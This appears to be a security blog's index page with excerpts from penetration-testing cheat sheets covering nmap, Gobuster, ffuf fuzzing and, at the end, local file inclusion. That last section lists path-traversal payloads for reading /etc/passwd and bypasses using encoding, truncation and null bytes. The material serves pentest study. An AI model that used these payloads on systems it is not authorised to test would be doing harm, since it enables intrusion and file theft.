Threat Intelligence

This entry is part 15 of 17 in the series Incident Response and Forensics

Threat Intelligence Foundation: Threat Intelligence is the analysis of data and information using tools and techniques to generate meaningful patterns on how to mitigate against potential risks associated with existing or emerging threats targeting organisations, industries, sectors or governments. To mitigate against risks, we can start by trying to answer a few simple questions: …

PenTest 101 – Cheat Sheet

Command | Description
sudo nano /etc/hosts | Opens the /etc/hosts with nano to start adding hostnames
sudo nmap -p 80,443,8000,8080,8180,8888,10000 --open -oA web_discovery -iL scope_list | Runs an nmap scan using common web application ports based on a scope list (scope_list) and outputs to a file (web_discovery) in all formats (-oA)
eyewitness --web -x web_discovery.xml -d <nameofdirectorytobecreated> | Runs eyewitness using a …

Gobuster Cheat Sheet

Common Gobuster Commands dir Mode With content length dns Mode With Show IP Base domain validation warning when the base domain fails to resolve Wildcard DNS is also detected properly: vhost Mode s3 Mode

Available Modes
Switch | Description
dir | Directory brute-forcing mode
dns | DNS subdomain brute-forcing mode
vhost | Virtual host brute-forcing mode (not the …

Complete Guide on ffuf

This entry is part 5 of 17 in the series Red Team Engagements

In web application penetration testing, entry points are areas of an application where a user can input data or interact with the system, which an attacker could potentially exploit. Identifying these points is crucial because they represent potential paths for unauthorized access, data manipulation, or other malicious actions. Common entry points include form fields, …

Ffuf – Cheat Sheet

Ffuf commands

Command | Description
ffuf -h | ffuf help
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ | Directory Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ | Extension Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php | Page Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v | Recursive Fuzzing
ffuf -w wordlist.txt:FUZZ -u https://FUZZ.nlabs.local/ | Sub-domain Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://nlabs.local:PORT/ …

File Inclusion – Cheat Sheet

Local File Inclusion

Command | Description
Basic LFI
/index.php?language=/etc/passwd | Basic LFI
/index.php?language=../../../../etc/passwd | LFI with path traversal
/index.php?language=/../../../etc/passwd | LFI with name prefix
/index.php?language=./languages/../../../../etc/passwd | LFI with approved path
LFI Bypasses
/index.php?language=....//....//....//....//etc/passwd | Bypass basic path traversal filter
/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 | Bypass filters with URL encoding
/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times] | Bypass appended extension with path truncation (obsolete)
/index.php?language=../../../../etc/passwd%00 | Bypass appended extension …